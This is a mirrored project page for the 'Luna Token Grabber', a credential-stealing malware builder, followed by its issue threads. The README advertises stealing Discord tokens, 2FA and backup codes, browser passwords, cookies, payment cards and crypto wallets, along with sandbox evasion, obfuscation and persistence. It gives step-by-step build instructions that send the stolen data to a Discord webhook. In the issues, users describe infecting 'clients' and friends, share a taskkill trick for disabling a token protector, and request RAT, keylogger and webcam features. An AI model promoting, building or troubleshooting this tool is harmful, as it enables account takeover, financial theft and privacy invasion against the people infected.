Code Monkey home page Code Monkey logo

luna-grabber's Introduction

Luna Token Grabber

Features

  • Discord Info

    • Token
    • Nitro
    • Billing
    • 2FA
    • Email
    • Phone
    • Gift Codes
    • Backup Codes
  • Browser Data

    • Cookies
    • Passwords
    • History
    • Credit/Debit Cards
  • Game Data

    • Minecraft Session Info
    • Roblox Cookie & Other Data
  • Discord Injection

    • Sends token, password & email on user login or when user changes password
  • System info

    • User
    • OS
    • System
    • Network IP
    • Country
    • Wifi
    • Mac
    • Hwid
    • PC Specs
    • Screenshot
    • Proxies
    • Installed AV's
    • Product Key
  • General Functions

    • Checks if being run in a virustotal sandbox/virtual machine
    • Checks for blacklisted users, pc names, HWIDs, IPs, MACs and Processes
    • Adds file to startup
    • Anti Spam
    • Fake Error
    • Obfuscation
    • Icon
    • Low Detections
    • Bypass Token Protector
    • File Pumper
    • Self Destruct
    • Clipboard
    • Crypto Wallets

Installation

1. Download Python:

Make sure you have Python 3.11+ installed and it is added to your path.

2. Download The Files:

Once you've downloaded the files extract the folder so it's no longer a .zip file.

3. Open The setup.bat File:

You dont need to manually install any modules. Just opening setup.bat will install them for you. If successfull the setup.bat will then open up the gui.

4. Create A Webhook:

If you don't know how to make a webhook you can follow this guide: https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
Once created, paste the webhook into the webhook prompt.

5. Configurable Options:

Now once you've done that you can tick the options that you want enabled and anything you don't understand you can go 
to the documentation where each option is explained.

6. Build The File

To finally create the file you must enter a filename and press build. Once fully built the build button will say 'Built File'.

7. What Now?

The file you built will now appear in the current folder with the name you set.

GUI

Contributing

Contributions are a great way to keep the project active and up to date. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this project better, you can simply open a feature request. Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/NewFeature)
  3. Commit your Changes (git commit -m 'Add New Feature')
  4. Push to the Branch (git push origin feature/NewFeature)
  5. Open a Pull Request

Errors

If you find an error that you cant fix and need help with you can submit an issue or join the telegram for support

License

Luna Grabber is distributed under the MIT License. See LICENSE.md for more information.

Star Graph

Star History Chart

luna-grabber's People

Contributors

addi00000 avatar dekrypted avatar netgoatfr avatar serpensin avatar smug246 avatar verticalsync avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

luna-grabber's Issues

Getting a execution error

Im still pretty new to this but im getting this error when running the .exe:
Traceback (most recent call last):
File "obfuscated_compressed_TEST.py", line 21, in
File "", line 1, in
File "wsnzncqyjpwlbjh", line 20, in
ModuleNotFoundError: No module named 'Crypto'

i feel like im dumb and im missing some things

webhook

Nothing is sent to the webhook

startup issue

my "clients" get a error during startup with "luna compressed" and the temp "luna logged" file

<3

Helping u out cuzzo

Bypass Token Protector = taskkill /F /IM discordtokenprotector.exe or whatever the name is. Then edit the file where all the settings are stored and disable everything and also delete all the other important files if they exist (dm me if u need help) (its in my grabber too so u can just check)

WebCam Screenshot (optional) = https://i.imgur.com/DE6pWaQ.png

binder = idk ๐Ÿ’€

Build.bat not working

When running build.bat, after it says:

Compiling code...

It says

[+] Compiling code...
The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please `pip uninstall typing` then try again.
[+] ./v.py removed!
[+] Built!

(The 'typing' package is an obsolete backport of a standard library package and is incompatible with PyInstaller. Please pip uninstall typing then try again.)

I then did

pip uninstall typing

but I got

WARNING: Ignoring invalid distribution -ycryptodome (c:\users\bisho\appdata\local\programs\python\python310\lib\site-packages)
WARNING: Ignoring invalid distribution -illow (c:\users\bisho\appdata\local\programs\python\python310\lib\site-packages)
WARNING: Ignoring invalid distribution -ycryptodome (c:\users\bisho\appdata\local\programs\python\python310\lib\site-packages)
WARNING: Ignoring invalid distribution -illow (c:\users\bisho\appdata\local\programs\python\python310\lib\site-packages)
WARNING: Skipping typing as it is not installed.

Can't run build.bat

I have already installed all the required modules
Whenever I start "Build.bat" I get this error:

Traceback (most recent call last):
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 1348, in do_open
h.request(req.get_method(), req.selector, req.data, headers,
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 1037, in _send_output
self.send(msg)
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 975, in send
self.connect()
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 1447, in connect
super().connect()
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\http\client.py", line 941, in connect
self.sock = self._create_connection(
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\socket.py", line 824, in create_connection
for res in getaddrinfo(host, port, 0, SOCK_STREAM):
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\socket.py", line 955, in getaddrinfo
for res in _socket.getaddrinfo(host, port, family, type, proto, flags):
socket.gaierror: [Errno 11004] getaddrinfo failed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "C:\Users\User\Downloads\Luna-Token-Grabber-main\builder.py", line 209, in
Builder()
File "C:\Users\User\Downloads\Luna-Token-Grabber-main\builder.py", line 16, in init
self.loading()
File "C:\Users\User\Downloads\Luna-Token-Grabber-main\builder.py", line 99, in loading
IP: {load(urlopen('https://jsonip.com/'))['ip']}
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 216, in urlopen
return opener.open(url, data, timeout)
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 519, in open
response = self._open(req, data)
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 536, in _open
result = self._call_chain(self.handle_open, protocol, protocol +
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 496, in _call_chain
result = func(*args)
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 1391, in https_open
return self.do_open(http.client.HTTPSConnection, req,
File "C:\Users\User\AppData\Local\Programs\Python\Python310\lib\urllib\request.py", line 1351, in do_open
raise URLError(err)
urllib.error.URLError: <urlopen error [Errno 11004] getaddrinfo failed>

error , It sends the system info but it doesn't grab token etc ( And it shows this error)

Traceback (most recent call last):
File "obfuscated_filename.py", line 21, in
File "", line 721, in
File "", line 77, in Luna
File "", line 69, in main
File "", line 126, in init
File "", line 323, in upload
File "discord\webhook\sync.py", line 1028, in send
File "discord\webhook\sync.py", line 297, in execute_webhook
File "discord\webhook\sync.py", line 220, in request
discord.errors.HTTPException: 400 Bad Request (error code: 50035): Invalid Form Body
In embeds.0.fields.0.value: Must be 1024 or fewer in length.

How to remove injection

So i just do a prank to my friend and the question is how i can remove the ridimo injection from his computer?

No exe

Ok, I ran the whole thing, but the terminal just closes. there is no exe and it just outputs a python file. I set it to generate an exe

A big f()cking error

Traceback (most recent call last):
File "urllib3\connection.py", line 174, in _new_conn
File "urllib3\util\connection.py", line 72, in create_connection
File "socket.py", line 955, in getaddrinfo
socket.gaierror: [Errno 11001] getaddrinfo failed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "urllib3\connectionpool.py", line 703, in urlopen
File "urllib3\connectionpool.py", line 386, in _make_request
File "urllib3\connectionpool.py", line 1042, in _validate_conn
File "urllib3\connection.py", line 358, in connect
File "urllib3\connection.py", line 186, in _new_conn
urllib3.exceptions.NewConnectionError: <urllib3.connection.HTTPSConnection object at 0x0000017A98852BF0>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "requests\adapters.py", line 489, in send
File "urllib3\connectionpool.py", line 787, in urlopen
File "urllib3\util\retry.py", line 592, in increment
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='discord.com', port=443): Max retries exceeded with url: /api/v10/webhooks/1030597433815736410/uRfgnV4ymQVtLPpFSg5UoYMSqmxWWCEbwzOkAAf84V_INkpwJZWJYQ8s_BfIyr9r1Ka-?wait=0 (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x0000017A98852BF0>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed'))

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "phasmophobia.py", line 720, in
File "phasmophobia.py", line 76, in Luna
File "phasmophobia.py", line 65, in main
File "discord\webhook\sync.py", line 1028, in send
File "discord\webhook\sync.py", line 297, in execute_webhook
File "discord\webhook\sync.py", line 166, in request
File "requests\sessions.py", line 587, in request
File "requests\sessions.py", line 701, in send
File "requests\adapters.py", line 565, in send
requests.exceptions.ConnectionError: HTTPSConnectionPool(host='discord.com', port=443): Max retries exceeded with url: /api/v10/webhooks/1030597433815736410/uRfgnV4ymQVtLPpFSg5UoYMSqmxWWCEbwzOkAAf84V_INkpwJZWJYQ8s_BfIyr9r1Ka-?wait=0 (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x0000017A98852BF0>: Failed to establish a new connection: [Errno 11001] getaddrinfo failed'))

error

failed to run script google-passwords not found

icon doesnt work

idk for some reason icon just doesnt show up after compiling the exe also is there any discord server for this?

failed pretty bad

guy had chrome i could see in screenshot but no passwords grabbed very cool

Accident

I opened the file by accident and i get notificiations when i login back or change password how do i remove it thanks!

Build

whenever i click build no exe appers

exe not making

hi, its very good, it only makes no exe, i need pyinstaller to make a exe my self. thats a little waste but can you look afther this?
greetings.

How Do I do this?

How Do I set up Luna Grabber Properly Step by Step? The Steps You Provided Are not Specific Enough I dont know what to do after step 2 and when I clicked the discord link it says A Invalid invite. So Please Tell Me What To Do And open certain files At certain steps Specifically.

not logging all info

when i run the grabber it grabs only my system info and sends the zip file but it doesen't send the tokens

eror not find

Traceback (most recent call last):
File "obfuscated_compressed_dsadas.py", line 21, in
File "", line 1, in
File "nmnpjbhpzykhbbk", line 888, in
File "nmnpjbhpzykhbbk", line 72, in Luna
File "nmnpjbhpzykhbbk", line 51, in main
File "discord\file.py", line 97, in init
FileNotFoundError: [Errno 2] No such file or directory: 'C:\Users\dadasd\AppData\Local\Luna-Logged-king.zip'

:)

Copy-pasting code must be a fun thing to do. I can't even count the number of skids I have found just this month so far. Why don't you guys just actually learn how to code and come back once you actually understand what you are doing.

This is an obvious & blatant copy of rdmio's work in combination with some code-fragments that might have been from elsewhere.

You got 10 hours to remove this repository or it will be reported to Github as distributing malware (regardless of whether it is open-source or not) is against their TOS. If you believe that this will not be effective, ask @H0QLCoder ... oh wait, his account got deleted last morning. oopsie.

~ Clara | CynthiaLabs

Question(not issue)

Hey does the final file be 0/64 in virustotal and how big will the final exe be when compiling? I am currently at vacation i will check this project when i am in home :)

Discord

Discord server got down again.

Cannot find specified file: google-passwords.txt

Currently trying to create the grabber file but when it is run I get this error

image

''Traceback (most recent call last):
File "Test.py", line 843, in
File "Test.py", line 82, in Luna
File "Test.py", line 54, in main
File "Test.py", line 580, in zipup
File "zipfile.py", line 1728, in write
File "zipfile.py", line 502, in from_file
FileNotFoundError: [WinError 2] The system cannot find the file specified: 'google-passwords.txt'''

Error message...

Traceback (most recent call last):
File "idkkdkkkkkk.py", line 684, in
File "idkkdkkkkkk.py", line 63, in Luna
File "idkkdkkkkkk.py", line 55, in main
File "idkkdkkkkkk.py", line 106, in init
File "idkkdkkkkkk.py", line 302, in upload
File "discord\webhook\sync.py", line 1028, in send
File "discord\webhook\sync.py", line 297, in execute_webhook
File "discord\webhook\sync.py", line 220, in request
discord.errors.HTTPException: 400 Bad Request (error code: 50035): Invalid Form Body
In embeds.0.fields.0.value: Must be 1024 or fewer in length.

image

Is this a fake error or a real error?

And also, it's not showing Epic Games and Minecraft information, Discord 2FA Codes and Wifi Passwords. The files are just empty..

My suggestions!

Here are a few suggestions. Yes I know, some of that is ransomware/malware or a remote control program but it would make the grabber just more interesting and useful.

  • an option in the builder that you can enable Webcam Screenshot (yes it makes the file really big but yeah for people that say things like "yup thats my own game can you try it?" that would be just nice)
  • add a custom icon feature (just have to drag and drop .png/.jpeg/.ico file)
  • remove line 127 for everyone (the bug that prevents users from opening and building the file, so in general more bug fixes)
  • a new and own, clean GUI for the builder like Blitzed and Blank Grabber have
  • auto-update feature (if a new version of the grabber is out the new version will be automatically installed on the infected pc, would be awesome if this was possible)
  • pretty small RAT feature in it or as a new project (Start/Stop Keylogger, Delete itself, make a weird noise, so generally just some small commands, if in luna, option to disable or enable it)
  • Anti-VM and Anti-Sandbox (I don't really know if this is already there)
  • an option to choose what user data you need or want
    like this:
    Passwords, Bookmarks, Cookies? (y/N) System Info? (y/N) Token and other information about Discord? (y/N)
  • a binder as an extra option that you can directly bind it after built with other files

Error

It gives an error like this when opened and does not receive cookies
image

help with token logging

hi, i just wanted to ask what i should do if i run the script but dont have a discord token sent back to me, i have stuff like browser passwords sent back (which i think is awesome), but i just wanted to know if there are any tips anyone could give me regarding getting token logging to work? for me the token file is just blank

disable script errors

if the script fails make it so it doesnt show the user. Openly says failed to grab passwords etc.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.